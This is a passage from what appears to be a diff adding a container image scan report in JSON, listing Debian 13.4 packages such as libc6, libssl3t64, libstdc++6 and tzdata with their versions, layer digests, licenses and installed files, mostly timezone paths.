"/usr/share/doc/libc6/README.Debian.gz", + "/usr/share/doc/libc6/README.hesiod.gz", + "/usr/share/doc/libc6/changelog.Debian.gz", + "/usr/share/doc/libc6/changelog.gz", + "/usr/share/doc/libc6/copyright", + "/usr/share/lintian/overrides/libc6" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libgcc-s1@14.2.0-19", + "Name": "libgcc-s1", + "Identifier": { + "PURL": "pkg:deb/debian/libgcc-s1@14.2.0-19?arch=amd64\u0026distro=debian-13.4", + "UID": "7ab1fb1391b2e39f" + }, + "Version": "14.2.0", + "Release": "19", + "Arch": "amd64", + "SrcName": "gcc-14", + "SrcVersion": "14.2.0", + "SrcRelease": "19", + "Maintainer": "Debian GCC Maintainers \u003cdebian-gcc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:8224d91da70b7992430d3b04040ea38ecdef4a7b719bee38397c89aaa886e198", + "DiffID": "sha256:c16b2ec4b1493bad1b1de23d659c899e60abb166bda756d02792f0a03ba54a43" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/libgcc_s.so.1", + "/usr/share/lintian/overrides/libgcc-s1" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libgomp1@14.2.0-19", + "Name": "libgomp1", + "Identifier": { + "PURL": "pkg:deb/debian/libgomp1@14.2.0-19?arch=amd64\u0026distro=debian-13.4", + "UID": "dca48fa7b9fb21ba" + }, + "Version": "14.2.0", + "Release": "19", + "Arch": "amd64", + "SrcName": "gcc-14", + "SrcVersion": "14.2.0", + "SrcRelease": "19", + "Maintainer": "Debian GCC Maintainers \u003cdebian-gcc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:dd0d9bfd3bee080ad25a464362ec4f37ec5ca625695a4d7179fe69d207dc068d", + "DiffID": "sha256:1f5d28bd51650f429293f7730ede274b81dc0744aa918bc887133c4ad610258c" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/libgomp.so.1.0.0" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libssl3t64@3.5.5-1~deb13u2", + "Name": "libssl3t64", + "Identifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "Version": "3.5.5", + "Release": "1~deb13u2", + "Arch": "amd64", + "SrcName": "openssl", + "SrcVersion": "3.5.5", + "SrcRelease": "1~deb13u2", + "Licenses": [ + "Apache-2.0", + "Artistic-2.0", + "GPL-1.0-or-later", + "GPL-1.0-only" + ], + "Maintainer": "Debian OpenSSL Team \u003cpkg-openssl-devel@alioth-lists.debian.net\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/engines-3/afalg.so", + "/usr/lib/x86_64-linux-gnu/engines-3/loader_attic.so", + "/usr/lib/x86_64-linux-gnu/engines-3/padlock.so", + "/usr/lib/x86_64-linux-gnu/libcrypto.so.3", + "/usr/lib/x86_64-linux-gnu/libssl.so.3", + "/usr/share/doc/libssl3t64/NEWS.Debian.gz", + "/usr/share/doc/libssl3t64/changelog.Debian.gz", + "/usr/share/doc/libssl3t64/changelog.gz", + "/usr/share/doc/libssl3t64/copyright", + "/usr/share/lintian/overrides/libssl3t64" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libstdc++6@14.2.0-19", + "Name": "libstdc++6", + "Identifier": { + "PURL": "pkg:deb/debian/libstdc%2B%2B6@14.2.0-19?arch=amd64\u0026distro=debian-13.4", + "UID": "f3c7fbb9133e1166" + }, + "Version": "14.2.0", + "Release": "19", + "Arch": "amd64", + "SrcName": "gcc-14", + "SrcVersion": "14.2.0", + "SrcRelease": "19", + "Maintainer": "Debian GCC Maintainers \u003cdebian-gcc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:7cc70dfd88cf2327bb827123c9156f7cb95de95b2f98f3a7a931296aacec5786", + "DiffID": "sha256:6e18ad80f3d64a8cbbcd1ff2e8a0d5ce7282cf664e816b86183a59d30a618e8a" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33", + "/usr/share/gcc/python/libstdcxx/__init__.py", + "/usr/share/gcc/python/libstdcxx/v6/__init__.py", + "/usr/share/gcc/python/libstdcxx/v6/printers.py", + "/usr/share/gcc/python/libstdcxx/v6/xmethods.py", + "/usr/share/gdb/auto-load/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.33-gdb.py" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "libzstd1@1.5.7+dfsg-1", + "Name": "libzstd1", + "Identifier": { + "PURL": "pkg:deb/debian/libzstd1@1.5.7%2Bdfsg-1?arch=amd64\u0026distro=debian-13.4", + "UID": "cea539729c307399" + }, + "Version": "1.5.7+dfsg", + "Release": "1", + "Arch": "amd64", + "SrcName": "libzstd", + "SrcVersion": "1.5.7+dfsg", + "SrcRelease": "1", + "Licenses": [ + "BSD-3-Clause", + "GPL-2.0-only", + "Zlib", + "MIT" + ], + "Maintainer": "RPM packaging team \u003cteam+pkg-rpm@tracker.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:bd8962e292918c50c90edebd9684c053bc386b9c5503acd8fec75d0c6f93a0b7", + "DiffID": "sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725" + }, + "InstalledFiles": [ + "/usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7", + "/usr/share/doc/libzstd1/changelog.Debian.gz", + "/usr/share/doc/libzstd1/changelog.gz", + "/usr/share/doc/libzstd1/copyright" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "media-types@13.0.0", + "Name": "media-types", + "Identifier": { + "PURL": "pkg:deb/debian/media-types@13.0.0?arch=all\u0026distro=debian-13.4", + "UID": "228e3dc215dfe5fa" + }, + "Version": "13.0.0", + "Arch": "all", + "SrcName": "media-types", + "SrcVersion": "13.0.0", + "Licenses": [ + "ad-hoc" + ], + "Maintainer": "Mime-Support Packagers \u003cteam+debian-mimesupport-packagers@tracker.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:d6b1b89eccacc15c2420b2776d72c1dae334a00805ed9af54bf2f71e4d536f28", + "DiffID": "sha256:275a30dd8ce958b21daa9ad962c6fbc09f98306ee2f486b65c9075dc257b1412" + }, + "InstalledFiles": [ + "/usr/share/bug/media-types/presubj", + "/usr/share/doc/media-types/changelog.gz", + "/usr/share/doc/media-types/copyright" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "netbase@6.5", + "Name": "netbase", + "Identifier": { + "PURL": "pkg:deb/debian/netbase@6.5?arch=all\u0026distro=debian-13.4", + "UID": "e2b4fdea75f64595" + }, + "Version": "6.5", + "Arch": "all", + "SrcName": "netbase", + "SrcVersion": "6.5", + "Licenses": [ + "GPL-2.0-only" + ], + "Maintainer": "Marco d'Itri \u003cmd@linux.it\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:c172f21841dff4c8cf45cde46589c1c2616cefe7e819965e92e6d3475c428aa0", + "DiffID": "sha256:621c35e751a51a9a9dc3e80aa0b7fe8be2a93402ea6ccd307d30852cd7776cda" + }, + "InstalledFiles": [ + "/usr/share/doc/netbase/changelog.gz", + "/usr/share/doc/netbase/copyright" + ], + "AnalyzedBy": "dpkg" + }, + { + "ID": "tzdata@2026a-0+deb13u1", + "Name": "tzdata", + "Identifier": { + "PURL": "pkg:deb/debian/tzdata@2026a-0%2Bdeb13u1?arch=all\u0026distro=debian-13.4", + "UID": "53ea93633158ea3e" + }, + "Version": "2026a", + "Release": "0+deb13u1", + "Arch": "all", + "SrcName": "tzdata", + "SrcVersion": "2026a", + "SrcRelease": "0+deb13u1", + "Licenses": [ + "public-domain" + ], + "Maintainer": "GNU Libc Maintainers \u003cdebian-glibc@lists.debian.org\u003e", + "Repository": { + "Class": "official" + }, + "Layer": { + "Digest": "sha256:b4e6f1bfce0a1fba2b5421041552f4a897aada9cd5680926580f9e2c6247a7ae", + "DiffID": "sha256:ac2a91ec876dfaf2145e14b0b43ce6b3ea3d4edb28a0df9d91c52f2efbb8e1a7" + }, + "InstalledFiles": [ + "/usr/share/doc/tzdata/NEWS.Debian.gz", + "/usr/share/doc/tzdata/README.Debian", + "/usr/share/doc/tzdata/changelog.Debian.gz", + "/usr/share/doc/tzdata/changelog.gz", + "/usr/share/doc/tzdata/copyright", + "/usr/share/lintian/overrides/tzdata", + "/usr/share/zoneinfo/Africa/Abidjan", + "/usr/share/zoneinfo/Africa/Accra", + "/usr/share/zoneinfo/Africa/Addis_Ababa", + "/usr/share/zoneinfo/Africa/Algiers", + "/usr/share/zoneinfo/Africa/Asmara", + "/usr/share/zoneinfo/Africa/Bamako", + "/usr/share/zoneinfo/Africa/Bangui", + "/usr/share/zoneinfo/Africa/Banjul", + "/usr/share/zoneinfo/Africa/Bissau", + "/usr/share/zoneinfo/Africa/Blantyre", + "/usr/share/zoneinfo/Africa/Brazzaville", + "/usr/share/zoneinfo/Africa/Bujumbura", + "/usr/share/zoneinfo/Africa/Cairo", + "/usr/share/zoneinfo/Africa/Casablanca", + "/usr/share/zoneinfo/Africa/Ceuta", + "/usr/share/zoneinfo/Africa/Conakry", + "/usr/share/zoneinfo/Africa/Dakar", + "/usr/share/zoneinfo/Africa/Dar_es_Salaam", + "/usr/share/zoneinfo/Africa/Djibouti", + "/usr/share/zoneinfo/Africa/Douala", + "/usr/share/zoneinfo/Africa/El_Aaiun", + "/usr/share/zoneinfo/Africa/Freetown", + "/usr/share/zoneinfo/Africa/Gaborone", + "/usr/share/zoneinfo/Africa/Harare", + "/usr/share/zoneinfo/Africa/Johannesburg", + "/usr/share/zoneinfo/Africa/Juba", + "/usr/share/zoneinfo/Africa/Kampala", + "/usr/share/zoneinfo/Africa/Khartoum", + "/usr/share/zoneinfo/Africa/Kigali", + "/usr/share/zoneinfo/Africa/Kinshasa", + "/usr/share/zoneinfo/Africa/Lagos", + "/usr/share/zoneinfo/Africa/Libreville", + "/usr/share/zoneinfo/Africa/Lome", + "/usr/share/zoneinfo/Africa/Luanda", + "/usr/share/zoneinfo/Africa/Lubumbashi", + "/usr/share/zoneinfo/Africa/Lusaka", + "/usr/share/zoneinfo/Africa/Malabo", + "/usr/share/zoneinfo/Africa/Maputo", + "/usr/share/zoneinfo/Africa/Maseru", + "/usr/share/zoneinfo/Africa/Mbabane", + "/usr/share/zoneinfo/Africa/Mogadishu", + "/usr/share/zoneinfo/Africa/Monrovia", + "/usr/share/zoneinfo/Africa/Nairobi", + "/usr/share/zoneinfo/Africa/Ndjamena", + "/usr/share/zoneinfo/Africa/Niamey", + "/usr/share/zoneinfo/Africa/Nouakchott", + "/usr/share/zoneinfo/Africa/Ouagadougou", + "/usr/share/zoneinfo/Africa/Porto-Novo", + "/usr/share/zoneinfo/Africa/Sao_Tome", + "/usr/share/zoneinfo/Africa/Tripoli", + "/usr/share/zoneinfo/Africa/Tunis", + "/usr/share/zoneinfo/Africa/Windhoek", + "/usr/share/zoneinfo/America/Adak", + "/usr/share/zoneinfo/America/Anchorage", + "/usr/share/zoneinfo/America/Anguilla", + "/usr/share/zoneinfo/America/Antigua", + "/usr/share/zoneinfo/America/Araguaina", + "/usr/share/zoneinfo/America/Argentina/Buenos_Aires", + "/usr/share/zoneinfo/America/Argentina/Catamarca", + "/usr/share/zoneinfo/America/Argentina/Cordoba", + "/usr/share/zoneinfo/America/Argentina/Jujuy", + "/usr/share/zoneinfo/America/Argentina/La_Rioja", + "/usr/share/zoneinfo/America/Argentina/Mendoza", + "/usr/share/zoneinfo/America/Argentina/Rio_Gallegos", + "/usr/share/zoneinfo/America/Argentina/Salta", + "/usr/share/zoneinfo/America/Argentina/San_Juan", + "/usr/share/zoneinfo/America/Argentina/San_Luis", + "/usr/share/zoneinfo/America/Argentina/Tucuman", + "/usr/share/zoneinfo/America/Argentina/Ushuaia", + "/usr/share/zoneinfo/America/Aruba", + "/usr/share/zoneinfo/America/Asuncion", + "/usr/share/zoneinfo/America/Atikokan", + "/usr/share/zoneinfo/America/Bahia", + "/usr/share/zoneinfo/America/Bahia_Banderas", + "/usr/share/zoneinfo/America/Barbados", + "/usr/share/zoneinfo/America/Belem", + "/usr/share/zoneinfo/America/Belize", + "/usr/share/zoneinfo/America/Blanc-Sablon", + "/usr/share/zoneinfo/America/Boa_Vista", + "/usr/share/zoneinfo/America/Bogota", + "/usr/share/zoneinfo/America/Boise", + "/usr/share/zoneinfo/America/Cambridge_Bay", + "/usr/share/zoneinfo/America/Campo_Grande", + "/usr/share/zoneinfo/America/Cancun", + "/usr/share/zoneinfo/America/Caracas", + "/usr/share/zoneinfo/America/Cayenne", + "/usr/share/zoneinfo/America/Cayman", + "/usr/share/zoneinfo/America/Chicago", + "/usr/share/zoneinfo/America/Chihuahua", + "/usr/share/zoneinfo/America/Ciudad_Juarez", + "/usr/share/zoneinfo/America/Costa_Rica", + "/usr/share/zoneinfo/America/Coyhaique", + "/usr/share/zoneinfo/America/Creston", + "/usr/share/zoneinfo/America/Cuiaba", + "/usr/share/zoneinfo/America/Curacao", + "/usr/share/zoneinfo/America/Danmarkshavn", + "/usr/share/zoneinfo/America/Dawson", + "/usr/share/zoneinfo/America/Dawson_Creek", + "/usr/share/zoneinfo/America/Denver", + "/usr/share/zoneinfo/America/Detroit", + "/usr/share/zoneinfo/America/Dominica", + "/usr/share/zoneinfo/America/Edmonton", + "/usr/share/zoneinfo/America/Eirunepe", + "/usr/share/zoneinfo/America/El_Salvador", + "/usr/share/zoneinfo/America/Fort_Nelson", + "/usr/share/zoneinfo/America/Fortaleza", + "/usr/share/zoneinfo/America/Glace_Bay", + "/usr/share/zoneinfo/America/Goose_Bay", + "/usr/share/zoneinfo/America/Grand_Turk", + "/usr/share/zoneinfo/America/Grenada", + "/usr/share/zoneinfo/America/Guadeloupe", + "/usr/share/zoneinfo/America/Guatemala", + "/usr/share/zoneinfo/America/Guayaquil", + "/usr/share/zoneinfo/America/Guyana", + "/usr/share/zoneinfo/America/Halifax", + "/usr/share/zoneinfo/America/Havana", + "/usr/share/zoneinfo/America/Hermosillo", + "/usr/share/zoneinfo/America/Indiana/Indianapolis", + "/usr/share/zoneinfo/America/Indiana/Knox", + "/usr/share/zoneinfo/America/Indiana/Marengo", + "/usr/share/zoneinfo/America/Indiana/Petersburg", + "/usr/share/zoneinfo/America/Indiana/Tell_City", + "/usr/share/zoneinfo/America/Indiana/Vevay", + "/usr/share/zoneinfo/America/Indiana/Vincennes", + "/usr/share/zoneinfo/America/Indiana/Winamac", + "/usr/share/zoneinfo/America/Inuvik", + "/usr/share/zoneinfo/America/Iqaluit", + "/usr/share/zoneinfo/America/Jamaica", + "/usr/share/zoneinfo/America/Juneau", + "/usr/share/zoneinfo/America/Kentucky/Louisville", + "/usr/share/zoneinfo/America/Kentucky/Monticello", + "/usr/share/zoneinfo/America/La_Paz", + "/usr/share/zoneinfo/America/Lima", + "/usr/share/zoneinfo/America/Los_Angeles", + "/usr/share/zoneinfo/America/Maceio", + "/usr/share/zoneinfo/America/Managua", + "/usr/share/zoneinfo/America/Manaus", + "/usr/share/zoneinfo/America/Martinique", + "/usr/share/zoneinfo/America/Matamoros", + "/usr/share/zoneinfo/America/Mazatlan", + "/usr/share/zoneinfo/America/Menominee", + "/usr/share/zoneinfo/America/Merida", + "/usr/share/zoneinfo/America/Metlakatla", + "/usr/share/zoneinfo/America/Mexico_City", + "/usr/share/zoneinfo/America/Miquelon", + "/usr/share/zoneinfo/America/Moncton", + "/usr/share/zoneinfo/America/Monterrey", + "/usr/share/zoneinfo/America/Montevideo", + "/usr/share/zoneinfo/America/Montserrat", + "/usr/share/zoneinfo/America/Nassau", + "/usr/share/zoneinfo/America/New_York", + "/usr/share/zoneinfo/America/Nome", + "/usr/share/zoneinfo/America/Noronha", + "/usr/share/zoneinfo/America/North_Dakota/Beulah", + "/usr/share/zoneinfo/America/North_Dakota/Center", + "/usr/share/zoneinfo/America/North_Dakota/New_Salem", + "/usr/share/zoneinfo/America/Nuuk", + "/usr/share/zoneinfo/America/Ojinaga", + "/usr/share/zoneinfo/America/Panama", + "/usr/share/zoneinfo/America/Paramaribo", + "/usr/share/zoneinfo/America/Phoenix", + "/usr/share/zoneinfo/America/Port-au-Prince", + "/usr/share/zoneinfo/America/Port_of_Spain", + "/usr/share/zoneinfo/America/Porto_Velho", + "/usr/share/zoneinfo/America/Puerto_Rico", + "/usr/share/zoneinfo/America/Punta_Arenas", + "/usr/share/zoneinfo/America/Rankin_Inlet", + "/usr/share/zoneinfo/America/Recife", + "/usr/share/zoneinfo/America/Regina", + "/usr/share/zoneinfo/America/Resolute", + "/usr/share/zoneinfo/America/Rio_Branco", + "/usr/share/zoneinfo/America/Santarem", + "/usr/share/zoneinfo/America/Santiago", + "/usr/share/zoneinfo/America/Santo_Domingo", + "/usr/share/zoneinfo/America/Sao_Paulo", + "/usr/share/zoneinfo/America/Scoresbysund", + "/usr/share/zoneinfo/America/Sitka", + "/usr/share/zoneinfo/America/St_Johns", + "/usr/share/zoneinfo/America/St_Kitts", + "/usr/share/zoneinfo/America/St_Lucia", + "/usr/share/zoneinfo/America/St_Thomas", + "/usr/share/zoneinfo/America/St_Vincent", + "/usr/share/zoneinfo/America/Swift_Current", + "/usr/share/zoneinfo/America/Tegucigalpa", + "/usr/share/zoneinfo/America/Thule", + "/usr/share/zoneinfo/America/Tijuana", + "/usr/share/zoneinfo/America/Toronto", + "/usr/share/zoneinfo/America/Tortola", + "/usr/share/zoneinfo/America/Vancouver", + "/usr/share/zoneinfo/America/Whitehorse", + "/usr/share/zoneinfo/America/Winnipeg", + "/usr/share/zoneinfo/America/Yakutat", + "/usr/share/zoneinfo/Antarctica/Casey", + "/usr/share/zoneinfo/Antarctica/Davis", + "/usr/share/zoneinfo/Antarctica/DumontDUrville", + "/usr/share/zoneinfo/Antarctica/Macquarie", + "/usr/share/zoneinfo/Antarctica/Mawson", + "/usr/share/zoneinfo/Antarctica/McMurdo", + "/usr/share/zoneinfo/Antarctica/Palmer", + "/usr/share/zoneinfo/Antarctica/Rothera", + "/usr/share/zoneinfo/Antarctica/Syowa", + "/usr/share/zoneinfo/Antarctica/Troll", + "/usr/share/zoneinfo/Antarctica/Vostok", + "/usr/share/zoneinfo/Asia/Aden", + "/usr/share/zoneinfo/Asia/Almaty", + "/usr/share/zoneinfo/Asia/Amman", + "/usr/share/zoneinfo/Asia/Anadyr", + "/usr/share/zoneinfo/Asia/Aqtau", + "/usr/share/zoneinfo/Asia/Aqtobe", + "/usr/share/zoneinfo/Asia/Ashgabat", + "/usr/share/zoneinfo/Asia/Atyrau", + "/usr/share/zoneinfo/Asia/Baghdad", + "/usr/share/zoneinfo/Asia/Bahrain", + "/usr/share/zoneinfo/Asia/Baku", + "/usr/share/zoneinfo/Asia/Bangkok", + "/usr/share/zoneinfo/Asia/Barnaul", + "/usr/share/zoneinfo/Asia/Beirut", + "/usr/share/zoneinfo/Asia/Bishkek", + "/usr/share/zoneinfo/Asia/Brunei", + "/usr/share/zoneinfo/Asia/Chita", + "/usr/share/zoneinfo/Asia/Colombo", + "/usr/share/zoneinfo/Asia/Damascus", + "/usr/share/zoneinfo/Asia/Dhaka", + "/usr/share/zoneinfo/Asia/Dili", + "/usr/share/zoneinfo/Asia/Dubai", + "/usr/share/zoneinfo/Asia/Dushanbe", + "/usr/share/zoneinfo/Asia/Famagusta", + "/usr/share/zoneinfo/Asia/Gaza", + "/usr/share/zoneinfo/Asia/Hebron", + "/usr/share/zoneinfo/Asia/Ho_Chi_Minh", + "/usr/share/zoneinfo/Asia/Hong_Kong", + "/usr/share/zoneinfo/Asia/Hovd", + "/usr/share/zoneinfo/Asia/Irkutsk", + "/usr/share/zoneinfo/Asia/Jakarta", + "/usr/share/zoneinfo/Asia/Jayapura", + "/usr/share/zoneinfo/Asia/Jerusalem", + "/usr/share/zoneinfo/Asia/Kabul", + "/usr/share/zoneinfo/Asia/Kamchatka", + "/usr/share/zoneinfo/Asia/Karachi", + "/usr/share/zoneinfo/Asia/Kathmandu", + "/usr/share/zoneinfo/Asia/Khandyga", + "/usr/share/zoneinfo/Asia/Kolkata", + "/usr/share/zoneinfo/Asia/Krasnoyarsk", + "/usr/share/zoneinfo/Asia/Kuala_Lumpur", + "/usr/share/zoneinfo/Asia/Kuching", + "/usr/share/zoneinfo/Asia/Kuwait", + "/usr/share/zoneinfo/Asia/Macau", + "/usr/share/zoneinfo/Asia/Magadan", + "/usr/share/zoneinfo/Asia/Makassar", + "/usr/share/zoneinfo/Asia/Manila", + "/usr/share/zoneinfo/Asia/Muscat", + "/usr/share/zoneinfo/Asia/Nicosia", + "/usr/share/zoneinfo/Asia/Novokuznetsk", + "/usr/share/zoneinfo/Asia/Novosibirsk", + "/usr/share/zoneinfo/Asia/Omsk", + "/usr/share/zoneinfo/Asia/Oral", + "/usr/share/zoneinfo/Asia/Phnom_Penh", + "/usr/share/zoneinfo/Asia/Pontianak", + "/usr/share/zoneinfo/Asia/Pyongyang", + "/usr/share/zoneinfo/Asia/Qatar", + "/usr/share/zoneinfo/Asia/Qostanay", + "/usr/share/zoneinfo/Asia/Qyzylorda", + "/usr/share/zoneinfo/Asia/Riyadh", + "/usr/share/zoneinfo/Asia/Sakhalin", + "/usr/share/zoneinfo/Asia/Samarkand", + "/usr/share/zoneinfo/Asia/Seoul", + "/usr/share/zoneinfo/Asia/Shanghai", + "/usr/share/zoneinfo/Asia/Singapore", + "/usr/share/zoneinfo/Asia/Srednekolymsk", + "/usr/share/zoneinfo/Asia/Taipei", + "/usr/share/zoneinfo/Asia/Tashkent", + "/usr/share/zoneinfo/Asia/Tbilisi", + "/usr/share/zoneinfo/Asia/Tehran", + "/usr/share/zoneinfo/Asia/Thimphu", + "/usr/share/zoneinfo/Asia/Tokyo", + "/usr/share/zoneinfo/Asia/Tomsk", + "/usr/share/zoneinfo/Asia/Ulaanbaatar", + "/usr/share/zoneinfo/Asia/Urumqi", + "/usr/share/zoneinfo/Asia/Ust-Nera", + "/usr/share/zoneinfo/Asia/Vientiane", + "/usr/share/zoneinfo/Asia/Vladivostok", + "/usr/share/zoneinfo/Asia/Yakutsk", + "/usr/share/zoneinfo/Asia/Yangon", + "/usr/share/zoneinfo/Asia/Yekaterinburg", + "/usr/share/zoneinfo/Asia/Yerevan", + "/usr/share/zoneinfo/Atlantic/Azores", + "/usr/share/zoneinfo/Atlantic/Bermuda", + "/usr/share/zoneinfo/Atlantic/Canary", + "/usr/share/zoneinfo/Atlantic/Cape_Verde", + "/usr/share/zoneinfo/Atlantic/Faroe", + "/usr/share/zoneinfo/Atlantic/Madeira", + "/usr/share/zoneinfo/Atlantic/Reykjavik", + "/usr/share/zoneinfo/Atlantic/South_Georgia", + "/usr/share/zoneinfo/Atlantic/St_Helena", + "/usr/share/zoneinfo/Atlantic/Stanley", + "/usr/share/zoneinfo/Australia/Adelaide", + "/usr/share/zoneinfo/Australia/Brisbane", + "/usr/share/zoneinfo/Australia/Broken_Hill", + "/usr/share/zoneinfo/Australia/Darwin", + "/usr/share/zoneinfo/Australia/Eucla", + "/usr/share/zoneinfo/Australia/Hobart", + "/usr/share/zoneinfo/Australia/Lindeman", + "/usr/share/zoneinfo/Australia/Lord_Howe", + "/usr/share/zoneinfo/Australia/Melbourne", + "/usr/share/zoneinfo/Australia/Perth", + "/usr/share/zoneinfo/Australia/Sydney", + "/usr/share/zoneinfo/Etc/GMT", + "/usr/share/zoneinfo/Etc/GMT+1", + "/usr/share/zoneinfo/Etc/GMT+10", + "/usr/share/zoneinfo/Etc/GMT+11", + "/usr/share/zoneinfo/Etc/GMT+12", + "/usr/share/zoneinfo/Etc/GMT+2", + "/usr/share/zoneinfo/Etc/GMT+3", + "/usr/share/zoneinfo/Etc/GMT+4", + "/usr/share/zoneinfo/Etc/GMT+5", + "/usr/share/zoneinfo/Etc/GMT+6", + "/usr/share/zoneinfo/Etc/GMT+7", + "/usr/share/zoneinfo/Etc/GMT+8", + "/usr/share/zoneinfo/Etc/GMT+9", + "/usr/share/zoneinfo/Etc/GMT-1", + "/usr/share/zoneinfo/Etc/GMT-10", + "/usr/share/zoneinfo/Etc/GMT-11", + "/usr/share/zoneinfo/Etc/GMT-12", + "/usr/share/zoneinfo/Etc/GMT-13", + "/usr/share/zoneinfo/Etc/GMT-14", + "/usr/share/zoneinfo/Etc/GMT-2", + "/usr/share/zoneinfo/Etc/GMT-3", + "/usr/share/zoneinfo/Etc/GMT-4", + "/usr/share/zoneinfo/Etc/GMT-5", + "/usr/share/zoneinfo/Etc/GMT-6", + "/usr/share/zoneinfo/Etc/GMT-7", + "/usr/share/zoneinfo/Etc/GMT-8", + "/usr/share/zoneinfo/Etc/GMT-9", + "/usr/share/zoneinfo/Etc/UTC", + "/usr/share/zoneinfo/Europe/Amsterdam", + "/usr/share/zoneinfo/Europe/Andorra", + "/usr/share/zoneinfo/Europe/Astrakhan", + "/usr/share/zoneinfo/Europe/Athens", + "/usr/share/zoneinfo/Europe/Belgrade", + "/usr/share/zoneinfo/Europe/Berlin", + "/usr/share/zoneinfo/Europe/Brussels", + "/usr/share/zoneinfo/Europe/Bucharest", + "/usr/share/zoneinfo/Europe/Budapest", + "/usr/share/zoneinfo/Europe/Chisinau", + "/usr/share/zoneinfo/Europe/Copenhagen", + "/usr/share/zoneinfo/Europe/Dublin", + "/usr/share/zoneinfo/Europe/Gibraltar", + "/usr/share/zoneinfo/Europe/Guernsey", + "/usr/share/zoneinfo/Europe/Helsinki", + "/usr/share/zoneinfo/Europe/Isle_of_Man", + "/usr/share/zoneinfo/Europe/Istanbul", + "/usr/share/zoneinfo/Europe/Jersey", + "/usr/share/zoneinfo/Europe/Kaliningrad", + "/usr/share/zoneinfo/Europe/Kirov", + "/usr/share/zoneinfo/Europe/Kyiv", + "/usr/share/zoneinfo/Europe/Lisbon", + "/usr/share/zoneinfo/Europe/Ljubljana", + "/usr/share/zoneinfo/Europe/London", + "/usr/share/zoneinfo/Europe/Luxembourg", + "/usr/share/zoneinfo/Europe/Madrid", + "/usr/share/zoneinfo/Europe/Malta", + "/usr/share/zoneinfo/Europe/Minsk", + "/usr/share/zoneinfo/Europe/Monaco", + "/usr/share/zoneinfo/Europe/Moscow", + "/usr/share/zoneinfo/Europe/Oslo", + "/usr/share/zoneinfo/Europe/Paris", + "/usr/share/zoneinfo/Europe/Prague", + "/usr/share/zoneinfo/Europe/Riga", + "/usr/share/zoneinfo/Europe/Rome", + "/usr/share/zoneinfo/Europe/Samara", + "/usr/share/zoneinfo/Europe/Sarajevo", + "/usr/share/zoneinfo/Europe/Saratov", + "/usr/share/zoneinfo/Europe/Simferopol", + "/usr/share/zoneinfo/Europe/Skopje", + "/usr/share/zoneinfo/Europe/Sofia", + "/usr/share/zoneinfo/Europe/Stockholm", + "/usr/share/zoneinfo/Europe/Tallinn", + "/usr/share/zoneinfo/Europe/Tirane", + "/usr/share/zoneinfo/Europe/Ulyanovsk", + "/usr/share/zoneinfo/Europe/Vaduz", + "/usr/share/zoneinfo/Europe/Vienna", + "/usr/share/zoneinfo/Europe/Vilnius", + "/usr/share/zoneinfo/Europe/Volgograd", + "/usr/share/zoneinfo/Europe/Warsaw", + "/usr/share/zoneinfo/Europe/Zagreb", + "/usr/share/zoneinfo/Europe/Zurich", + "/usr/share/zoneinfo/Factory", + "/usr/share/zoneinfo/Indian/Antananarivo", + "/usr/share/zoneinfo/Indian/Chagos", + "/usr/share/zoneinfo/Indian/Christmas", + "/usr/share/zoneinfo/Indian/Cocos", + "/usr/share/zoneinfo/Indian/Comoro", + "/usr/share/zoneinfo/Indian/Kerguelen", + "/usr/share/zoneinfo/Indian/Mahe", + "/usr/share/zoneinfo/Indian/Maldives", + "/usr/share/zoneinfo/Indian/Mauritius", + "/usr/share/zoneinfo/Indian/Mayotte", + "/usr/share/zoneinfo/Indian/Reunion", + "/usr/share/zoneinfo/Pacific/Apia", + "/usr/share/zoneinfo/Pacific/Auckland", + "/usr/share/zoneinfo/Pacific/Bougainville", + "/usr/share/zoneinfo/Pacific/Chatham", + "/usr/share/zoneinfo/Pacific/Chuuk", + "/usr/share/zoneinfo/Pacific/Easter", + "/usr/share/zoneinfo/Pacific/Efate", + "/usr/share/zoneinfo/Pacific/Fakaofo", + "/usr/share/zoneinfo/Pacific/Fiji", + "/usr/share/zoneinfo/Pacific/Funafuti", + "/usr/share/zoneinfo/Pacific/Galapagos", + "/usr/share/zoneinfo/Pacific/Gambier", + "/usr/share/zoneinfo/Pacific/Guadalcanal", + "/usr/share/zoneinfo/Pacific/Guam", + "/usr/share/zoneinfo/Pacific/Honolulu", + "/usr/share/zoneinfo/Pacific/Kanton", + "/usr/share/zoneinfo/Pacific/Kiritimati", + "/usr/share/zoneinfo/Pacific/Kosrae", + "/usr/share/zoneinfo/Pacific/Kwajalein", + "/usr/share/zoneinfo/Pacific/Majuro", + "/usr/share/zoneinfo/Pacific/Marquesas", + "/usr/share/zoneinfo/Pacific/Midway", + "/usr/share/zoneinfo/Pacific/Nauru", + "/usr/share/zoneinfo/Pacific/Niue", + "/usr/share/zoneinfo/Pacific/Norfolk", + "/usr/share/zoneinfo/Pacific/Noumea", + "/usr/share/zoneinfo/Pacific/Pago_Pago", + 